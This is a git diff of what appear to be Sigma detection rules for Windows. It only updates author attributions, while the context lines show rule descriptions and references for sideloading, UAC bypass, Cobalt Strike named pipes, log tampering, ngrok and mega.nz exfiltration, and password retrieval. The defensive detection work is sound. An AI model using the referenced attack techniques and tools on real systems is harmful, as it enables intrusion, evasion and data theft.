     - https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md
-author: Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project)
+author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project)
 date: 2022/08/14
 modified: 2023/01/09
 tags:
diff --git a/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml b/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml
index 540bbb446..2a1efbf07 100644
--- a/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml
+++ b/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml
@@ -12,7 +12,7 @@ references:
     - https://github.com/Wh04m1001/SysmonEoP
     - https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
     - http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/09
 modified: 2023/01/30
 tags:
diff --git a/rules/windows/image_load/image_load_side_load_office_dlls.yml b/rules/windows/image_load/image_load_side_load_office_dlls.yml
index 19084453d..0b5daf8cc 100644
--- a/rules/windows/image_load/image_load_side_load_office_dlls.yml
+++ b/rules/windows/image_load/image_load_side_load_office_dlls.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location
 references:
     - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)
-author: Nasreddine Bencherchali, Wietze Beukema (project and research)
+author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
 date: 2022/08/17
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/image_load/image_load_side_load_scm.yml b/rules/windows/image_load/image_load_side_load_scm.yml
index fd244a0c5..1f311e422 100644
--- a/rules/windows/image_load/image_load_side_load_scm.yml
+++ b/rules/windows/image_load/image_load_side_load_scm.yml
@@ -5,7 +5,7 @@ description: Detects DLL sideloading of DLLs that are loaded by the SCM for some
 references:
     - https://decoded.avast.io/martinchlumecky/png-steganography/
     - https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/01
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/image_load/image_load_side_load_third_party.yml b/rules/windows/image_load/image_load_side_load_third_party.yml
index 10e7e0aea..443ad1024 100644
--- a/rules/windows/image_load/image_load_side_load_third_party.yml
+++ b/rules/windows/image_load/image_load_side_load_third_party.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)
 references:
     - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)
-author: Nasreddine Bencherchali, Wietze Beukema (project and research)
+author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
 date: 2022/08/17
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/image_load/image_load_side_load_vmguestlib.yml b/rules/windows/image_load/image_load_side_load_vmguestlib.yml
index 952edea99..8f388df66 100644
--- a/rules/windows/image_load/image_load_side_load_vmguestlib.yml
+++ b/rules/windows/image_load/image_load_side_load_vmguestlib.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.
 references:
     - https://decoded.avast.io/martinchlumecky/png-steganography/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/12/01
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/image_load/image_load_side_load_web_browsers.yml b/rules/windows/image_load/image_load_side_load_web_browsers.yml
index 3ab680e9c..f28b8d52a 100644
--- a/rules/windows/image_load/image_load_side_load_web_browsers.yml
+++ b/rules/windows/image_load/image_load_side_load_web_browsers.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects DLL sideloading of DLLs that are part of web browsers
 references:
     - https://hijacklibs.net/ # For list of DLLs that could be sideloaded (search for dlls mentioned here in there)
-author: Nasreddine Bencherchali, Wietze Beukema (project and research)
+author: Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)
 date: 2022/08/17
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/image_load/image_load_susp_cmstp.yml b/rules/windows/image_load/image_load_susp_cmstp.yml
index b7784af32..27fda43c1 100644
--- a/rules/windows/image_load/image_load_susp_cmstp.yml
+++ b/rules/windows/image_load/image_load_susp_cmstp.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects cmstp loading "dll" or "ocx" files from suspicious locations
 references:
     - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/30
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/image_load/image_load_susp_dll_load_system_process.yml b/rules/windows/image_load/image_load_susp_dll_load_system_process.yml
index fc2acbb2e..01aa2aa55 100644
--- a/rules/windows/image_load/image_load_susp_dll_load_system_process.yml
+++ b/rules/windows/image_load/image_load_susp_dll_load_system_process.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%
 references:
     - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/17
 modified: 2022/12/02
 tags:
diff --git a/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml b/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml
index ee6c3c45f..8bd273d4b 100644
--- a/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml
+++ b/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs
 references:
     - https://github.com/bats3c/EvtMute
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/09/07
 modified: 2022/11/29
 tags:
diff --git a/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml b/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml
index 067d4917e..b4f40bba4 100644
--- a/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml
+++ b/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml
@@ -5,7 +5,7 @@ description: Detects the "iscsicpl.exe" UAC bypass technique that leverages a DL
 references:
     - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC
     - https://twitter.com/wdormann/status/1547583317410607110
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/17
 modified: 2022/07/25
 tags:
diff --git a/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml b/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml
index 82e939764..96b4a5934 100644
--- a/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml
+++ b/rules/windows/image_load/image_load_usp_svchost_clfsw32.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances
 references:
     - https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/09/07
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml b/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml
index ce9aae974..5dba6005a 100644
--- a/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml
+++ b/rules/windows/image_load/image_load_vmware_xfer_load_dll_from_nondefault_path.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects loading of a DLL by the VMware Xfer utility from the non-default directory which may be an attempt to sideload arbitrary DLL
 references:
     - https://www.sentinelone.com/labs/lockbit-ransomware-side-loads-cobalt-strike-beacon-with-legitimate-vmware-utility/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/02
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/network_connection/net_connection_win_binary_github_com.yml b/rules/windows/network_connection/net_connection_win_binary_github_com.yml
index 4014699fc..a5da3843e 100755
--- a/rules/windows/network_connection/net_connection_win_binary_github_com.yml
+++ b/rules/windows/network_connection/net_connection_win_binary_github_com.yml
@@ -6,7 +6,7 @@ references:
     - https://twitter.com/M_haggis/status/900741347035889665
     - https://twitter.com/M_haggis/status/1032799638213066752
     - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/exfil/Invoke-ExfilDataToGitHub.ps1
-author: Michael Haag (idea), Florian Roth (rule)
+author: Michael Haag (idea), Florian Roth (Nextron Systems)
 date: 2017/08/24
 modified: 2021/11/27
 tags:
diff --git a/rules/windows/network_connection/net_connection_win_binary_susp_com.yml b/rules/windows/network_connection/net_connection_win_binary_susp_com.yml
index 54e117dcd..7d2049433 100755
--- a/rules/windows/network_connection/net_connection_win_binary_susp_com.yml
+++ b/rules/windows/network_connection/net_connection_win_binary_susp_com.yml
@@ -7,7 +7,7 @@ references:
     - https://twitter.com/M_haggis/status/1032799638213066752
     - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker
     - https://www.cisa.gov/uscert/ncas/alerts/aa22-321a
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2018/08/30
 modified: 2023/01/19
 tags:
diff --git a/rules/windows/network_connection/net_connection_win_crypto_mining.yml b/rules/windows/network_connection/net_connection_win_crypto_mining.yml
index e45637de6..3b6617e47 100644
--- a/rules/windows/network_connection/net_connection_win_crypto_mining.yml
+++ b/rules/windows/network_connection/net_connection_win_crypto_mining.yml
@@ -4,7 +4,7 @@ status: stable
 description: Detects process connections to a Monero crypto mining pool
 references:
     - https://www.poolwatch.io/coin/monero
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/10/26
 tags:
     - attack.impact
diff --git a/rules/windows/network_connection/net_connection_win_eqnedt.yml b/rules/windows/network_connection/net_connection_win_eqnedt.yml
index 12ae5491e..dff60b653 100755
--- a/rules/windows/network_connection/net_connection_win_eqnedt.yml
+++ b/rules/windows/network_connection/net_connection_win_eqnedt.yml
@@ -5,7 +5,7 @@ description: Detects network connections from Equation Editor
 references:
     - https://twitter.com/forensicitguy/status/1513538712986079238
     - https://news.sophos.com/en-us/2019/07/18/a-new-equation-editor-exploit-goes-commercial-as-maldoc-attacks-using-it-spike/
-author: Max Altgelt
+author: Max Altgelt (Nextron Systems)
 date: 2022/04/14
 tags:
     - attack.execution
diff --git a/rules/windows/network_connection/net_connection_win_hh.yml b/rules/windows/network_connection/net_connection_win_hh.yml
index 8c2734bcc..7d3483788 100644
--- a/rules/windows/network_connection/net_connection_win_hh.yml
+++ b/rules/windows/network_connection/net_connection_win_hh.yml
@@ -8,7 +8,7 @@ description: Detects network connections made by the "hh.exe" process, which cou
 references:
     - https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html
     - https://github.com/redcanaryco/atomic-red-team/blob/1cf4dd51f83dcb0ebe6ade902d6157ad2dbc6ac8/atomics/T1218.001/T1218.001.md
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/05
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml b/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml
index a0af40626..5f5c2dd32 100755
--- a/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml
+++ b/rules/windows/network_connection/net_connection_win_malware_backconnect_ports.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases
 references:
     - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/19
 modified: 2022/10/05
 tags:
diff --git a/rules/windows/network_connection/net_connection_win_mega_nz.yml b/rules/windows/network_connection/net_connection_win_mega_nz.yml
index 1dff349b5..83c9e88e0 100644
--- a/rules/windows/network_connection/net_connection_win_mega_nz.yml
+++ b/rules/windows/network_connection/net_connection_win_mega_nz.yml
@@ -5,7 +5,7 @@ description: Detects an executable accessing mega.co.nz, which could be a sign o
 references:
     - https://megatools.megous.com/
     - https://www.mandiant.com/resources/russian-targeting-gov-business
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/12/06
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/network_connection/net_connection_win_ngrok_io.yml b/rules/windows/network_connection/net_connection_win_ngrok_io.yml
index 3db0d9864..ae0bca43b 100644
--- a/rules/windows/network_connection/net_connection_win_ngrok_io.yml
+++ b/rules/windows/network_connection/net_connection_win_ngrok_io.yml
@@ -5,7 +5,7 @@ description: Detects an executable accessing ngrok.io, which could be a sign of
 references:
     - https://ngrok.com/
     - https://www.virustotal.com/gui/file/cca0c1182ac114b44dc52dd2058fcd38611c20bb6b5ad84710681d38212f835a/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/07/16
 tags:
     - attack.exfiltration
diff --git a/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml b/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml
index 9f54a1bb0..509e28bf9 100644
--- a/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml
+++ b/rules/windows/network_connection/net_connection_win_ngrok_tunnel.yml
@@ -5,7 +5,7 @@ description: Detects an executable accessing an ngrok tunneling endpoint, which
 references:
     - https://twitter.com/hakluke/status/1587733971814977537/photo/1
     - https://ngrok.com/docs/secure-tunnels/tunnels/ssh-reverse-tunnel-agent
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/11/03
 tags:
     - attack.exfiltration
diff --git a/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml b/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml
index e0bb02c95..91740354b 100755
--- a/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml
+++ b/rules/windows/network_connection/net_connection_win_powershell_network_connection.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects a Powershell process that opens network connections - check for suspicious target ports and target systems - adjust to your environment (e.g. extend filters with company's ip range')
 references:
     - https://www.youtube.com/watch?v=DLtJTxMWZ2o
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/13
 modified: 2023/01/20
 tags:
diff --git a/rules/windows/network_connection/net_connection_win_rdp_to_http.yml b/rules/windows/network_connection/net_connection_win_rdp_to_http.yml
index 47953ef9b..00e0a1c79 100644
--- a/rules/windows/network_connection/net_connection_win_rdp_to_http.yml
+++ b/rules/windows/network_connection/net_connection_win_rdp_to_http.yml
@@ -5,7 +5,7 @@ description: Detects svchost hosting RDP termsvcs communicating to target system
 references:
     - https://twitter.com/tekdefense/status/1519711183162556416?s=12&t=OTsHCBkQOTNs1k3USz65Zg
     - https://www.mandiant.com/resources/bypassing-network-restrictions-through-rdp-tunneling
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/04/29
 modified: 2022/07/14
 tags:
diff --git a/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml b/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
index ff1d3c1fd..246b2969f 100755
--- a/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
+++ b/rules/windows/network_connection/net_connection_win_rundll32_net_connections.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects a rundll32 that communicates with public IP addresses
 references:
     - https://www.hybrid-analysis.com/sample/759fb4c0091a78c5ee035715afe3084686a8493f39014aea72dae36869de9ff6?environmentId=100
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/11/04
 modified: 2022/12/30
 tags:
diff --git a/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml b/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml
index 6845fe88a..78029c3cd 100644
--- a/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml
+++ b/rules/windows/network_connection/net_connection_win_susp_binary_no_cmdline.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious network connections made by a well-known Windows binary run with no command line parameters
 references:
     - https://redcanary.com/blog/raspberry-robin/
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/07/03
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/network_connection/net_connection_win_susp_cmstp.yml b/rules/windows/network_connection/net_connection_win_susp_cmstp.yml
index 48daf9a9c..2272d71ca 100644
--- a/rules/windows/network_connection/net_connection_win_susp_cmstp.yml
+++ b/rules/windows/network_connection/net_connection_win_susp_cmstp.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects suspicious network connection by Cmstp
 references:
     - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/30
 tags:
     - attack.defense_evasion
diff --git a/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml b/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml
index 1c7822845..64f9a0536 100644
--- a/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml
+++ b/rules/windows/network_connection/net_connection_win_susp_dropbox_api.yml
@@ -5,7 +5,7 @@ description: Detects an executable that isn't dropbox but communicates with the
 references:
     - https://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb
     - https://www.zscaler.com/blogs/security-research/new-espionage-attack-molerats-apt-targeting-users-middle-east
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2022/04/20
 logsource:
     category: network_connection
diff --git a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml
index 06c238c9f..ad2f8d984 100755
--- a/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml
+++ b/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects programs with network connections running in suspicious files system locations
 references:
     - https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo
-author: Florian Roth, Tim Shelton
+author: Florian Roth (Nextron Systems), Tim Shelton
 date: 2017/03/19
 modified: 2022/05/26
 tags:
diff --git a/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml b/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml
index 31b2a0ff1..3ae653567 100644
--- a/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml
+++ b/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects creation of default named pipe used by the DiagTrackEoP POC
 references:
     - https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/03
 tags:
     - attack.privilege_escalation
diff --git a/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml b/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml
index 7c3987afc..957e4104f 100644
--- a/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml
+++ b/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml
@@ -5,7 +5,7 @@ description: Detects the pattern of a pipe name as used by the tool EfsPotato
 references:
     - https://twitter.com/SBousseaden/status/1429530155291193354?s=20
     - https://github.com/zcgonvh/EfsPotato
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/08/23
 modified: 2022/06/20
 tags:
diff --git a/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml b/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml
index 7a853237e..6a9e10ab4 100644
--- a/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml
+++ b/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects creation of default named pipes used by the Koh tool
 references:
     - https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/07/08
 tags:
     - attack.privilege_escalation
diff --git a/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml b/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml
index cb0236bb6..9ca006e3f 100644
--- a/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml
+++ b/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml
@@ -8,7 +8,7 @@ references:
     - https://github.com/SigmaHQ/sigma/issues/253
     - https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/
     - https://redcanary.com/threat-detection-report/threats/cobalt-strike/
-author: Florian Roth, Wojciech Lesicki
+author: Florian Roth (Nextron Systems), Wojciech Lesicki
 date: 2021/05/25
 modified: 2022/10/31
 tags:
diff --git a/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml b/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml
index 235a22de4..040265dd5 100644
--- a/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml
+++ b/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml
@@ -5,7 +5,7 @@ description: Detects the creation of a named pipe matching a pattern used by Cob
 references:
     - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
     - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/07/30
 modified: 2022/12/31
 tags:
diff --git a/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml b/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml
index 473d6cacb..9a4913de4 100644
--- a/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml
+++ b/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml
@@ -15,7 +15,7 @@ references:
     - https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf
     - https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/
     - https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/
-author: Florian Roth, blueteam0ps, elhoim
+author: Florian Roth (Nextron Systems), blueteam0ps, elhoim
 date: 2017/11/06
 modified: 2022/03/15
 tags:
diff --git a/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml b/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml
index afd3675e3..ff6f55783 100644
--- a/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml
+++ b/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects PAExec default named pipe
 references:
     - https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/10/26
 tags:
     - attack.execution
diff --git a/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml b/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml
index ad29185eb..41fa2e118 100644
--- a/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml
+++ b/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml
@@ -8,7 +8,7 @@ description: Detects PsExec default pipe creation where the image executed is lo
 references:
     - https://www.jpcert.or.jp/english/pub/sr/ir_research.html
     - https://jpcertcc.github.io/ToolAnalysisResultSheet
-author: Nasreddine Bencherchali
+author: Nasreddine Bencherchali (Nextron Systems)
 date: 2022/08/04
 tags:
     - attack.execution
diff --git a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml
index 0fa98a2af..f9760d37f 100644
--- a/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml
+++ b/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml
@@ -5,7 +5,7 @@ description: Detects the creation of a named pipe with a pattern found in Cobalt
 references:
     - https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575
     - https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752
-author: Florian Roth, Christian Burkard
+author: Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems)
 date: 2021/07/30
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml b/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml
index c868b66b4..54dd2ff2b 100644
--- a/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml
+++ b/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects the WMI Event Consumer service scrcons.exe creating a named pipe
 references:
     - https://github.com/RiccardoAncarani/LiquidSnake
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2021/09/01
 modified: 2022/10/09
 tags:
diff --git a/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml b/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml
index 8c46b03d4..9a4b6d6e4 100644
--- a/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml
+++ b/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml
@@ -4,7 +4,7 @@ status: experimental
 description: Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
 references:
     - http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/
-author: Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements)
+author: Florian Roth (Nextron Systems), Lee Holmes (idea), Harish Segar (improvements)
 date: 2017/03/22
 modified: 2022/12/02
 tags:
diff --git a/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml b/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml
index a1c1dffa6..65ff383ae 100644
--- a/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml
+++ b/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml
@@ -4,7 +4,7 @@ status: test
 description: Detects PowerShell called from an executable by the version mismatch method
 references:
 - https://adsecurity.org/?p=2921
-author: Sean Metcalf (source), Florian Roth (rule)
+author: Sean Metcalf (source), Florian Roth (Nextron Systems)
 date: 2017/03/05
 modified: 2022/12/25
 tags:
diff --git a/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml b/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml
index 99423a91e..87eb56ab1 100644
--- a/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml
+++ b/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml
@@ -7,7 +7,7 @@ status: experimental
 description: Detects suspicious PowerShell download command
 references:
 - https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html
-author: Florian Roth
+author: Florian Roth (Nextron Systems)
 date: 2017/03/05
 modified: 2022/11/09
 tags:
diff --git a/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml b/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml
index c420b1ccc..397c248ed 100644
--- a/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml
+++ b/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml
@@ -11,7 +11,7 @@ references:
 - https://github.com/samratashok/ADModule
 - https://twitter.com/cyb3rops/status/1617108657166061568?s=20
 - https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges
-author: Nasreddine Bencherchali, frack113
+author: Nasreddine Bencherchali (Nextron Systems), frack113
 date: 2023/01/22
 tags:
 - attack.reconnaissance
diff --git a/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml b/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml
index a3746dd18..c80caf91b 100644
--- a/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml
+++ b/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml
@@ -5,7 +5,7 @@ description: Detects suspicious invocation of the Get-ADDBAccount script that re
 references:
 - https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/
